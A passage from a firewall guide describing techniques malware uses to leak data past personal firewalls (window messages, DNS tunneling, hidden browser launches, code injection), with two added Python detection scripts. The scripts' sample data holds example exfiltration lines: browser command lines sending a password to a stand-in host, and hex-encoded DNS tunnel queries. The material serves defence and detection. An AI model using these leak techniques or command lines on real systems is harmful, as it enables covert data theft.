Penetration techniques – Part 2

Continuing the series from the Agnitum firewall guide:
3. Application window control
Windows allows applications to exchange window messages between processes. Malicious processes can take control of other network-enabled applications by sending them window messages that imitate keyboard input and mouse clicks. An example of this technique is the Breakout leaktest (http://www.firewallleaktester.com/leaktest16.htm).
The underlying mechanism is inter-process interaction through the SendMessage and PostMessage APIs and similar calls. This technique is sometimes used for legitimate inter-process interaction, but it can likewise be used for nefarious purposes by perpetrators.
4. Active Desktop modification
By installing a specially crafted HTML file as the Active Desktop, malicious processes can transfer private data on behalf of Windows Explorer. An example of this technique is the Breakout leaktest (http://www.firewallleaktester.com/leaktest16.htm).
Outpost Firewall Pro controls such attempts to steal data by deceiving the firewall.

5. DNS query submission
The DNS Client service exposes a potential weakness known as DNS tunneling: malicious code can send and receive arbitrary information inside well-formed DNS packets via the correctly configured, operational DNS server. An example of this technique is the DNSTester leaktest (http://www.klake.org/~jt/dnshell/).
Outpost Firewall Pro performs double verification of access to the DNS Client service, which makes the system more secure. This controls access to the DNS API even while the DNS Client service is running, benefiting users who cannot disable the service themselves for compatibility reasons. Permission to use the DNS Client service can be assigned to a specific process.
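Detection logic for the DNS tunneling pattern described above, as an added example that is not part of the original guide or of Outpost Firewall Pro; the log line format, the sample queries and the thresholds are constructed assumptions:

```python
import re
from collections import defaultdict

# Constructed sample DNS query log lines; the "<time> <process> <queried-name>"
# format is an assumption, not the output of any real logging tool.
SAMPLE_LOG = """\
10:00:01 outlook.exe mail.example.com
10:00:02 outlook.exe autodiscover.example.com
10:00:03 dnstest.exe 6a6f686e3a7365637265743132.tun.example.net
10:00:04 dnstest.exe 70617373776f72643d68756e74657232.tun.example.net
10:00:05 dnstest.exe 636f6e6669672e696e692d646174612d.tun.example.net
10:00:06 chrome.exe www.example.org
"""

# Labels that look like hex or base32 payloads rather than host names.
ENCODED_LABEL = re.compile(r"^[0-9a-f]{16,}$|^[a-z2-7]{24,}$")

def parse_line(line):
    """Split a log line into (process, zone, subdomain labels)."""
    _time, process, name = line.split()
    labels = name.strip(".").lower().split(".")
    # Assumption: the last two labels are the zone an attacker would control;
    # everything in front of them is where tunneled data would be carried.
    return process, ".".join(labels[-2:]), labels[:-2]

def analyze(log, max_label=20, churn=3):
    """Return {(process, zone): set(reasons)} for query streams that look like tunneling."""
    subdomains = defaultdict(set)
    reasons = defaultdict(set)
    for line in log.splitlines():
        if not line.strip():
            continue
        process, zone, sub = parse_line(line)
        key = (process, zone)
        subdomains[key].add(".".join(sub))
        for label in sub:
            if len(label) > max_label:
                reasons[key].add("long_label")
            if ENCODED_LABEL.match(label):
                reasons[key].add("encoded_label")
    # Many distinct subdomains under one zone from one process is the churn
    # a tunnel produces when each query must carry a fresh chunk of data.
    for key, subs in subdomains.items():
        if len(subs) >= churn:
            reasons[key].add("subdomain_churn")
    return dict(reasons)

if __name__ == "__main__":
    for key, why in analyze(SAMPLE_LOG).items():
        print(key, sorted(why))
```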
6. Application launch with URL
Malicious processes can launch the default web browser with a pre-configured web address in a hidden window, making the firewall believe that a legitimate action is taking place. Firewalls that explicitly trust an application without checking who actually launched it and what additional connection parameters were supplied cannot challenge this technique, so sensitive data can leave the computer past them. Examples of this technique are the Tooleaky and Ghost leaktests (http://www.firewallleaktester.com/leaktest2.htm, http://www.firewallleaktester.com/leaktest13.htm).
7. Application launch with command line parameters
Several firewalls are vulnerable to malicious code launching the default web browser with command-line parameters, which circumvents the existing protection because the firewall is led to believe that a legitimate application is performing legitimate actions. Those command-line parameters, however, may contain private or critical data together with the host name of its intended recipient. An example of this technique is the Wallbreaker leaktest (http://www.firewallleaktester.com/leaktest11.htm).
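Detection logic for the hidden browser launch (section 6) and the command-line parameter leak (section 7) described above, as an added example that is not part of the original guide or of Outpost Firewall Pro; the process-creation event fields, the parent process names and the thresholds are constructed assumptions:

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed process-creation events; the field names and the leaktest-style
# parent process names are assumptions, not real log records.
EVENTS = [
    {"parent": "explorer.exe", "image": "chrome.exe",
     "cmdline": "chrome.exe https://www.example.com/"},
    {"parent": "tooleaky.exe", "image": "iexplore.exe",
     "cmdline": 'iexplore.exe "http://leak.example.net/collect?user=jdoe&pw=s3cret"'},
    {"parent": "wallbreaker.exe", "image": "iexplore.exe",
     "cmdline": 'iexplore.exe "http://leak.example.net/SGVsbG8gV29ybGQgdGhpcyBpcyBsZWFrZWQgZGF0YQ=="'},
    {"parent": "chrome.exe", "image": "chrome.exe", "cmdline": "chrome.exe --type=renderer"},
]

BROWSERS = {"iexplore.exe", "chrome.exe", "firefox.exe", "msedge.exe"}
# Parents that normally start a browser on the user's behalf (the shell, or the browser itself).
INTERACTIVE_PARENTS = {"explorer.exe"} | BROWSERS
URL_RE = re.compile(r"https?://[^\s\"']+")

def data_bearing(url, max_segment=40):
    """True when the URL carries a query string or an unusually long path segment,
    i.e. it looks like it is transporting data rather than just naming a page."""
    parts = urlsplit(url)
    if parse_qs(parts.query):
        return True
    return any(len(seg) > max_segment for seg in parts.path.split("/"))

def suspicious_launches(events):
    """Return (parent, browser, url) for browser launches by a non-interactive parent
    whose command line passes a data-bearing URL."""
    hits = []
    for ev in events:
        if ev["image"].lower() not in BROWSERS:
            continue
        if ev["parent"].lower() in INTERACTIVE_PARENTS:
            continue  # the user (via the shell) or the browser itself started it
        for url in URL_RE.findall(ev["cmdline"]):
            if data_bearing(url):
                hits.append((ev["parent"], ev["image"], url))
    return hits

if __name__ == "__main__":
    for parent, browser, url in suspicious_launches(EVENTS):
        print(f"{parent} launched {browser} with data-bearing URL {url}")
```

A firewall that, as the text describes, checks the launching process and the connection parameters is applying the same two tests at enforcement time rather than after the fact.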
8. Critical registry entry modification
Malicious processes can modify the registry to gain network access on behalf of another application, for example Windows Explorer. An example of this technique is the Jumper leaktest (http://www.firewallleaktester.com/leaktest17.htm).
9. OLE application control
A relatively new technique controls applications' activity through OLE (Object Linking and Embedding), a Windows mechanism that allows one program to manage the behavior of another program on the same computer. It uses OLE inter-process communication to exchange data and commands between applications, for example to drive the Internet Explorer web browser so that it sends user-specified data to a remote location. An example of this technique is the PCFlank leaktest (http://www.pcflank.com/PCFlankLeaktest.exe).
10. Process memory modification
Several Trojan horses and viruses use sophisticated techniques that let them alter the code of trusted applications running in memory and thereby bypass the system security perimeter to perform their malicious activities. This is also known as code injection or the copycat vulnerability. Examples of this technique are the Thermite and Copycat leaktests (http://www.firewallleaktester.com/leaktest8.htm, http://www.firewallleaktester.com/leaktest9.htm).
The memory-modification control decides this per application: for example, Visual Studio 2005 would be allowed to modify memory, while the "copycat.exe" leak test would be denied. This feature protects even against "unknown" malware not yet detected by antivirus and anti-spyware vendors.
11. Low-level network access
Some network drivers allow direct access to the network adapter, bypassing the standard TCP/IP stack. These drivers can be used by sniffers and other malicious programs to obtain low-level network access, and they pose an additional risk to the system because traffic passing through them cannot be screened by a firewall. An example of this technique is the MBtest leaktest (http://www.firewallleaktester.com/leaktest10.htm).
Control of this access strengthens the overall network security level by preventing outbound data leakage. The user can control an application's attempts to open a network-enabled driver, so without the user's authorization an application cannot send even ARP or IPX data.